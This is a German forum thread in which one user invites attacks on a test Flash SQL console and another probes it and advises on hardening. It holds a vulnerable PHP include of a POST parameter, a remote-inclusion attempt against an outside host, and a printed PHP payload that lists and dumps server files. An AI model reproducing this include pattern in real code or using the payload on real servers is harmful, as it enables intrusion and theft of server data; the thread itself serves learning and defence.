Flash SQL Console

[pixelsadist]

LINK

wie versprochen hier meine sql console mit der man alles abfragen /ändern /erzeugen/löschen kann sofern man das passwort kennt.

Falls ihr der Meinung seid es sei nicht sicher versucht bitte irgendwas in die datenbank zu schreiben oder zu ändern durch irgendeine injection ^^


Damit ihr auch alles drauf anwenden könnt um wirklich festzustellen wie sicher es ist hab die anzahl der versuche nicht eingeschränkt und auch keine IP sperre nach erfolglosen versuchen integriert.

Viel Glück

[thomas_E]

Verdammt bin ich in SQL eingerostet; das muss ich dringendst mal auffrischen.

Zitat:

Viel Glück

mach ma:

Code:

SELECT * FROM flashforum

und ein Auszug aus SHOW VARIABLES:

Code:

antwort=
 || Variable Name | value | 
 || hostname | Server2 | 
 || basedir | /usr/local/mysql | 
 || general_log_file | /users/_sql/mysql/Server2.log | 
 || version | 5.5.16 | 
 || version_comment | MySQL Community Server (GPL) | 
 || version_compile_machine | x86_64 | 
 || version_compile_os | linux2.6 |

und ich bin ein Laie auf dem Gebiet

[pixelsadist]

LOL du wunderknabe ^^

wenn du mir noch erzählst wie du es gemacht hast kann ich mir was neues überlegen wie ich diese sicherheitslücke schliessen kann ^^

Hast du das DB passwort rausgefunden oder nur über die Flashseite?

[thomas_E]

nix wunderknabe, nur etwas rumprobieren

ich hab swf und passworteingabe umgangen, und direkt die sql_console.php genutzt, als ich entdeckt hab, dass die komplett ungeschützt ist.

mal ganz nebenbei, auch die anderen PHP-Dateien könnten von jemandem erfahrenen geknackt werden, da diese in einem ungeschützten Ordner liegen.

hier noch mehr lektüre:
[tutorial] PHP Code Injection
http://hakipedia.com/index.php/Poison_Null_Byte
http://hakipedia.com/index.php/Local_File_Inclusion
und die Schwachstelle ist überall das selbe, nämlich dass was du da gerade baust und abzusichern versuchst. Ein ungeprüfte Verarbeitung von Benutzereingaben (ich mein nicht das Passwort, sondern das Query)

[pixelsadist]

kannst dir garnicht vorstellen wie sehr du mir hilfst ^^ thx nochmal ,

Ich werde später drauf zurückkommen wegen geschütztem Bereich etc..^^

[thomas_E]

Zitat:

Ich werde später drauf zurückkommen wegen geschütztem Bereich etc.

pack zumindest ne htaccess-Datei da rein mit nem Passwort, wenn man den Ordner direkt aufrufen will.
idealerweise wäre es jedoch, wenn du den PHP-Ordner ausserhalb des root-Ordners plazierst (dann ist er im Browser gar nicht mehr adressierbar). das wird aber idr. nur dann möglich sein, wenn du root-rechte aufm Server hast hast.

schau dir auch mal mod_rewrite an. und damit dann (fast) alle Anfragen an eine php-Datei umleiten (ja, es könne auch mehrere sein, aber das war mir dann mit den RewriteRules zu kompliziert)
damit kann man deine Odnerstruktur nicht mehr auslesen, und auch keine PHP-Dateien mehr direkt ansprechen.
als ausnahmen würde ich nur je einen JS, CSS und Images-Ordner ansehen. ALLES andere (gültig oder nicht) wird in die zentrale php-datei geleitet, und dort verarbeitet.

[pixelsadist]

ich teste es gerade mit der htaccess variante.Der php ordner ist geschützt aber wenn ich in flash bei der sql console auf senden klicke und die scripte ausgeführt werden, öffnet sich die htaccess-passwortaufforderung.Wie kann ich das vermeiden ?

die sieht momentan so aus:

AuthUserFile /users/pixelsadist/www/sql/php/.htpasswd
AuthName "V"
AuthType Basic
require valid-user
Options -Indexes
IndexIgnore *.php *.txt *.jpg *.ico *.png *.js *.css *.flv

[pixelsadist]

habs nur mit "Deny from all" versucht aber damit funktioniert die flashseite auch nicht

[pixelsadist]

ok also sofern ich das richtig verstanden habe hat bisher die flashdatei durch die verwendung des zielpfades der php dateien den gleichen effekt wie wenn man die php dateien direkt aufruft deshalb hat deny from all bei der ausführung der php scripte nicht funktioniert.

-ich hab in dem php ordner ein htaccess eingefügt dieses enthält nur "deny from all
Somit wird nix angezeigt wenn ich die php dateien direkt aufrufe(konnte sowieso über den browser davor auch nichts abrufen , habs aber auch mit einer normalen txt datei getestet und es funktioniert).

- danach hab ich eine umleitung.php in dem hauptordner der flashseite geschrieben , diese sieht so aus:

PHP-Code:

<?php 

$php_adresse = $_POST['zieladresse'];
include($php_adresse);

?>

und jedes script das in flash aufgerufen wird sendet/empfängt die daten nur an/von umleitung.php mit einer zusätzlichen variable in der die entsprechende zieladresse der eigentlichen php datei enthalten ist .

Somit werden die scripte von der flashseite weiterhin ausgeführt und gleichzeitig die php dateien geschützt.


Ob Thomas es vielleicht testen könnte ?!?!? ^^

[thomas_E]

sry, wenn ich das so hart sagen muss, aber du hast echt mehr glück als Verstand

Code:

Warning: include() [function.include]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /users/pixelsadist/www/sql/umleitung.php on line 4

Warning: include(http://www.xxxxxxxxxx.de/show.txt) [function.include]: failed to open stream: no suitable wrapper could be found in /users/pixelsadist/www/sql/umleitung.php on line 4

Warning: include() [function.include]: Failed opening 'http://www.xxxxxxxxxx.de/show.txt' for inclusion (include_path='.') in /users/pixelsadist/www/sql/umleitung.php on line 4

nur zur Info, in der show.txt steht folgendes:

PHP-Code:

<?php
    function parseFolder($folder)
    {
        foreach(scandir($folder) as $entry){
            if($entry == "." || $entry == "..") continue;
            $entry = "$folder/$entry";
            if(is_dir($entry)){
                parseFolder($entry);
            }else{
                echo '<input type="submit" name="file" value="'.$entry.'" /><br/>';
            }
        }
    }

    if(!empty($_POST['file'])){
//zeigt mir die ausgewählte Datei Klartext an
        header("Content-Type: text/plain", true);
        echo file_get_contents($_POST['file']);
    }else{
//gibt mir ein schönes formular aus, mit 1Button/Datei
        echo '<html><head></head><body><form action="'.$_SERVER["REQUEST_URI"].'" method="POST">';
        foreach($_POST as $key => $value) printf('<input type="hidden" name="%s" value="%s" />', $key, $value);
        parseFolder($_SERVER["DOCUMENT_ROOT"], "");
        echo '</form></body></html>';
    }
?>

1. LÖSCH SOFORT DIE umleitung.php VON DEINEM SERVER
2. LIES DIR DIE VERLINKTEN SEITEN DURCH !!!
3. MACH SOWAS NIE WIEDER AUF EINEM SYSTEM DAS ONLINE ERREICHBAR IST

[pixelsadist]

keine Sorge der server dient nur zu testzwecken.

Eine kurze aufklärung wäre nett ^^. War mein Versuch mit include für die katz ? ^^

[thomas_E]

dein Versuch mit inclide ist höchst gefährlich. dich hat nur deine Server-Cofiguration davor geschützt, dass den Inhalt meiner show.txt als PHP-Code auf deinem Server ausführen konnte.

PHP-Code:

keine Sorge der server dient nur zu testzwecken. 


na dann, alles gute
bei soviel leichtsinn und entgegen jeder belehrung kannst du es gebrauchen

[pixelsadist]

bin ja dabei es zu ändern, ich versuch die eingabedaten erstmal zu filtern und include zu vermeiden

[pixelsadist]

ich hab es umgeschrieben, jetzt werden all übergebenen adressevariablen mit dem inhalt eines array vergliechen falls diese nicht vorhanden sind kommt es zur keiner weiteren verarbeitung aller übergebenen variablen. Ich glaube die php dateien sind ziemlich "sicher" .
Wenn thomas jetzt versuchen könnte etwas in die db zu schreiben ^^ ??!!??!?

[pixelsadist]

ich hab ne weitere sicherheitslücke gefunden. Falls der Angreifer eine schlüsselvariable übergibt die im array vorkommt kommt es zur include dieser pfadvariable die eine php datei lädt aus dem geschützten php ordner und kann somit die weitere übergebenen variablen an diese geschützten php datei die ja mit include geladen wird manipulieren deshalb werde ich jetzt alle übergebene variablen mit einem key verschlüsseln an php senden und mit dem gleichen key entschlüsseln so besteht keine möglichkeit für den angreifer irgendwas zu verändern sofern er den key nicht kennt und wie sicher der key ist hängt von dem genutzen verschlüsselungsalgorithmus ab.